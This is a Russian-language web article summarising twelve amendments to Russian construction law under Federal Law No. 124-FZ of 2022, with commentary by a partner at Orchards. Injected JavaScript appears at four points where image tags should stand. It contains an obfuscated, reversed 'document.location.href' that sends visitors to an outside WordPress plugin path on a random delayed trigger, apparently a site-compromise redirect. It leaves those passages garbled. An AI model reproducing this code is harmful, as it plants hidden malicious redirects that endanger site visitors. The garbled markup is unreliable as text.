Обзор законодательства в сфере строительства

Комментарий Юрия Аксёнова, партнёра Orchards, для СтроимПросто.

Изменения в области антикризисных мер обсудим в контексте Федерального закона от 01.05.2022 № 124-ФЗ «О внесении изменений в Градостроительный кодекс Российской Федерации и отдельные законодательные акты Российской Федерации», который раскрывает суть 12 поправок к существующим законам.

1. Исключено требование о предоставлении заключения ФОИВ, осуществляющего федеральный государственный санитарно-эпидемиологический надзор, для размещения объектов в границах седьмой подзоны приаэродромной территории (до установления в ее границах ограничений по осуществлению строительства) в отношении объектов, являющихся ненормируемыми по уровню шума.

2. Снижены требования к подрядчикам, выполняющим строительные работы, — допускается не состоять в СРО при выполнении контракта (договора) с ценой до 10 млн. руб. Ранее это значение было до 3 млн. руб.

По мнению Юрия Аксёнова, партнёра Orchards, снижение требований о членстве в СРО при выполнении работ до 10 млн рублей даст возможность привлечь в строительные проекты большее число представителей малого бизнеса, а возможность увеличения лимита авансирования свыше 30% позволит подрядчикам, выполняющим капитальный ремонт в МКД, минимизировать риски «кассовых разрывов» и убытков в условиях высокой волатильности цен на материалы.

3. Особенности градостроительной деятельности, установленные «транспортным законом» от 31.07.2020 № 254-ФЗ (установление ВРИ на основании ППТ, представление на экспертизу ПД линейного объекта до утверждения ППТ, временная эксплуатация построенной части об (этапа) объекта, особенности получения ТУ, изменение категории земель на основании ППТ, особенности публичных сервитутов и изъятия и др.) распространены на случаи строительства или реконструкции:

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-msk.ru/stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage/app/media/News/2022/08/infographika1psd.webp» alt=»»/>

4. Определено, что в случае частичной реконструкции сетей, например при перекладке в целях строительства основного объекта, допускается проводить кадастровые работы только в отношении реконструированной части такой сети.

5 Порядок, предусматривающий, что при выдаче РВ построенный объект проверяется на соответствие ограничениям использования земель и видам разрешенного использования земельных участков, установленным на дату выдачи РС, распространен на случаи выдачи РС в период с 01.01.2022 до 01.01.2023.

6. Упрощены правила проведения капитального ремонта линейных объектов, включая возможность осуществления капитального ремонта методом «параллельной прокладки»:

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-msk.ru/stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage/app/media/News/2022/08/infographika2psd.webp» alt=»»/>

7. Исключена норма, предоставлявшая возможность использовать при исполнении контракта на строительство реконструкцию сметные нормативы и цены на строительные ресурсы, использованные при определении сметной стоимости строительства (ранее допускалось при наличии соответствующего условия в контракте}.

8. Установлен запрет для ФОИВ, ОИВ субъекта РФ, органов местного самоуправления, подведомственных им организаций при реализации проекта по строительству ОКС на предъявление требований к застройщику, техническому заказчику о предоставлении документов, сведений и материалов, которые имеются у указанных органов и организаций.

9. Определены дополнительные полномочия Правительства Российской Федерации на период 2022 года в части:

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-msk.ru/stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torage/app/media/News/2022/08/infographika3psd.webp» alt=»»/>

10. Установлен срок согласования строительства в границах придорожной полосы автомобильной дороги с ее собственником – 7 рабочих дней. В случае не поступления позиции собственника в установленный срок такое строительство или реконструкции считаются согласованными.

11. Установлена возможность уплаты региональным оператором в качестве аванса более чем 30% стоимости соответствующего вида услуг и (или) работ по капитальному ремонту общего имущества в МКД в случаях и порядке, которые будут установлены Правительством РФ.

12. Установлены отдельные сроки осуществления одновременного государственного кадастрового учета и (или) государственной регистрации прав в отношении земельных участков, предназначенных для ИЖС, ЛПХ, садоводства, огородничества, гаражного строительства, а также расположенных на них объектов при обращении с заявлением через Росреестр (3 рабочих дня} и при обращении через МФЦ (5 рабочих дней).

toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-msk.ru/publications/obzor-otraslevogo-zakonodatelstva-s-ekspertami/»>Ссылка на статью >>

Подпишитесь на Telegram Orchards

X